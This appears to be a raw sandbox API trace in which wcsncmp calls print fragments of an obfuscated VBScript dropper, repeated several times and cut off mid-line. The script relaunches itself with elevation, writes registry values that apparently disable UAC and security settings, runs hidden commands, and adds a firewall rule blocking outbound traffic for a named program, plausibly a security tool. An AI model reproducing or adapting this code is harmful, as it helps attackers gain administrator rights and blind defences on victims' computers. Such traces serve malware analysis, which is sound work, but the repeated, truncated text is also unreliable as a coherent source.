bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.964] wcsncmp (_String1="))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.964] wcsncmp (_String1=")-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.964] wcsncmp (_String1="-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0222.964] wcsncmp (_String1="65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0222.964] wcsncmp (_String1="5)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = 